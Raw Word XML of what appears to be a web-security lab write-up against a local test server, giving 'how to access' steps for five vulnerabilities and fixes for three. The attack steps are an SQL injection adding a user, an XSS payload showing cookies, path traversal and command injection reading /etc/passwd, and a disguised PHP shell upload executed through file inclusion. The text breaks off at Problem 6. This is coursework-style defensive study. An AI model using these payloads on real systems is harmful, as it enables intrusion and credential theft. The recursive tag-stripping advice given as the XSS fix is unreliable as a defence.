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5A22AB" w14:textId="77777777" w:rsidR="00A920BE" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0B0BF" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B952D3" w14:textId="03B29F19" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">Put into username column: </w:t>
      </w:r>
      <w:r w:rsidR="007E2460" w:rsidRPr="00F01CBB">
        <w:t>'; INSERT INTO users(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007E2460" w:rsidRPr="00F01CBB">
        <w:t>username,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007E2460" w:rsidRPr="00F01CBB">
        <w:t>) VALUES('user1','password'); --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB3CCC" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>Log in with username ‘user1’, and password ‘password’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C483746" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397D581D" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to fix or avoid this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C8390" w14:textId="392989BB" w:rsidR="00FA0A99" w:rsidRPr="00F01CBB" w:rsidRDefault="00FA0A99" w:rsidP="00FA0A99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>create a statement template, which the database server can parse, compile, optimize, and store in PHP</w:t>
      </w:r>
      <w:r w:rsidR="00A23D01" w:rsidRPr="00F01CBB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA28A7" w14:textId="331B7C00" w:rsidR="00027FA2" w:rsidRDefault="00FA0A99" w:rsidP="00FA0A99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>$statement = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>'SELECT password FROM users WHERE username = ?')</w:t>
      </w:r>
      <w:r w:rsidR="00A23D01" w:rsidRPr="00F01CBB">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78977A" w14:textId="2520808A" w:rsidR="008F38FE" w:rsidRPr="00F01CBB" w:rsidRDefault="008F38FE" w:rsidP="00FA0A99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>$statemen</w:t>
      </w:r>
      <w:r w:rsidR="00244683">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F38FE">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F38FE">
        <w:t>bind_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F38FE">
        <w:t>param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F38FE">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F38FE">
        <w:t>'s', $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070CFE3" w14:textId="1E3382B1" w:rsidR="00A23D01" w:rsidRPr="00F01CBB" w:rsidRDefault="00A23D01" w:rsidP="00A23D01">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>supply values for the parameters, and the database server executes the statement using these values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2C9C1" w14:textId="6AEFFE3B" w:rsidR="00FA0A99" w:rsidRPr="00F01CBB" w:rsidRDefault="00A23D01" w:rsidP="00FA0A99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>$statement-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF9182" w14:textId="77777777" w:rsidR="00765481" w:rsidRPr="00F01CBB" w:rsidRDefault="00765481" w:rsidP="00FA0A99">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E65985" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A052EC3" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA2D97" w14:textId="3E8DF4E2" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00651A93" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidR="00027FA2" w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D159CC" w:rsidRPr="00F01CBB">
        <w:t>&lt;s&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D159CC" w:rsidRPr="00F01CBB">
        <w:t>scriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>&gt; alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D159CC" w:rsidRPr="00F01CBB">
        <w:t>); &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613AD08" w14:textId="7E841EB2" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="008C1DA8" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">Pop-up message: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A82D5" w14:textId="6D62DD99" w:rsidR="002F6E80" w:rsidRPr="00F01CBB" w:rsidRDefault="002F6E80" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04DC160B" wp14:editId="3E801E81">
            <wp:extent cx="6184088" cy="196658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9757" b="26406"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6184900" cy="1966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1E811" w14:textId="77777777" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00027FA2" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to fix or avoid this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490BE0D" w14:textId="33918B7C" w:rsidR="00027FA2" w:rsidRPr="00F01CBB" w:rsidRDefault="00765481" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>Strip &lt;script&gt; recursively until all the &lt;script&gt; has been s</w:t>
      </w:r>
      <w:r w:rsidR="00927771">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>triped</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2ADA24" w14:textId="77777777" w:rsidR="00765481" w:rsidRPr="00F01CBB" w:rsidRDefault="00765481" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD7C573" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEA69F" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174BECB0" w14:textId="07DFAA25" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">Put into </w:t>
      </w:r>
      <w:r w:rsidR="00555970" w:rsidRPr="00F01CBB">
        <w:t>web browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>192.168.56.2/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>index.php?theme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>=../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044911" w:rsidRPr="00F01CBB">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B1803E7" w14:textId="13D85B85" w:rsidR="00EE2A75" w:rsidRPr="00F01CBB" w:rsidRDefault="00EE2A75" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>In the source of the response webpage, verify that /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve"> was indeed included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042AA91A" w14:textId="75B20FE0" w:rsidR="00EE2A75" w:rsidRPr="00F01CBB" w:rsidRDefault="00EE2A75" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A99F422" wp14:editId="283273D2">
            <wp:extent cx="6563403" cy="4566374"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1" name="图片 1" descr="屏幕快照%202016-11-05%2023.13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屏幕快照%202016-11-05%2023.13.2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95" cy="45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3E7B0" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to fix or avoid this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4AE5E2" w14:textId="77777777" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>do not use values directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23603EE6" w14:textId="77777777" w:rsidR="00D66372" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>($_COOKIE['theme']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DC176" w14:textId="1827517E" w:rsidR="00E2636E" w:rsidRPr="00F01CBB" w:rsidRDefault="00E2636E" w:rsidP="00E2636E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E2636E">
        <w:t>$Theme = $_COOKIE['theme'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC09AC" w14:textId="4E544EA3" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">if  </w:t>
      </w:r>
      <w:r w:rsidR="00E2636E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00E2636E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Theme</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve"> == ‘dark.css’</w:t>
      </w:r>
      <w:r w:rsidR="00E2636E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BD62F" w14:textId="376E0300" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:tab/>
        <w:t>include('dark.css');</w:t>
      </w:r>
      <w:r w:rsidR="00E2636E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1394CCF3" w14:textId="77777777" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074FBEC" w14:textId="2BCF6DC1" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:tab/>
        <w:t>include('light.css');</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB24540" w14:textId="77777777" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00D66372" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E7ADAC" w14:textId="32F16BBF" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00D66372">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE9A5F" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051794AD" w14:textId="77777777" w:rsidR="00D66372" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">Put into </w:t>
      </w:r>
      <w:r w:rsidR="00E131DF" w:rsidRPr="00F01CBB">
        <w:t>web browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D7FD4" w14:textId="74AF5DF4" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="000E0AD4" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>http://192.168.56.2/gallery.php?removeImage=upload1478358964.jpg;%20cat%20/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD9BA4" w14:textId="02145802" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00E131DF" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:t>Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78E5F3" w14:textId="23549467" w:rsidR="00E131DF" w:rsidRPr="00F01CBB" w:rsidRDefault="00E131DF" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ECE03E3" wp14:editId="38DFF059">
            <wp:extent cx="6184900" cy="2682875"/>
            <wp:effectExtent l="0" t="0" r="1270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9396" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4790CDC3" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19329DD0" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>How to access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48690FB4" w14:textId="585FEC6E" w:rsidR="00065F53" w:rsidRPr="00F01CBB" w:rsidRDefault="00F01CBB" w:rsidP="00065F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shellcode.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> as</w:t>
      </w:r>
      <w:r w:rsidR="00065F53" w:rsidRPr="00F01CBB">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00F7125B">
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidR="00065F53" w:rsidRPr="00F01CBB">
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the webserver will accept this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BA4B8" w14:textId="77777777" w:rsidR="0060512A" w:rsidRDefault="0060512A" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The name of the shellcode file got:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7B712" w14:textId="5CDD07DC" w:rsidR="00536B22" w:rsidRDefault="00F7125B" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F7125B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26837916" wp14:editId="44CBD8D6">
            <wp:extent cx="2753403" cy="217711"/>
            <wp:effectExtent l="0" t="0" r="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1888" cy="2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5C74" w14:textId="63D54E1A" w:rsidR="0060512A" w:rsidRDefault="0060512A" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use the file inclusion vulnerability from Problem 3 to execute the shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA4C73" w14:textId="4D12569D" w:rsidR="00536B22" w:rsidRDefault="00F7125B" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7125B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53919B20" wp14:editId="71B9131F">
            <wp:extent cx="6184900" cy="44196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746A" w14:textId="3527D449" w:rsidR="00F7125B" w:rsidRDefault="00F7125B" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A57BE" w14:textId="6F103950" w:rsidR="00F7125B" w:rsidRPr="00F01CBB" w:rsidRDefault="00F7125B" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7125B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C73A2FA" wp14:editId="2D22E524">
            <wp:extent cx="6184900" cy="28321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BCD3" w14:textId="77777777" w:rsidR="00F7125B" w:rsidRDefault="00F7125B" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4643B19E" w14:textId="77777777" w:rsidR="00536B22" w:rsidRPr="00F01CBB" w:rsidRDefault="00536B22" w:rsidP="00675E7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00F01CBB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Problem 6</w:t>
      </w:r>
    </w:p>
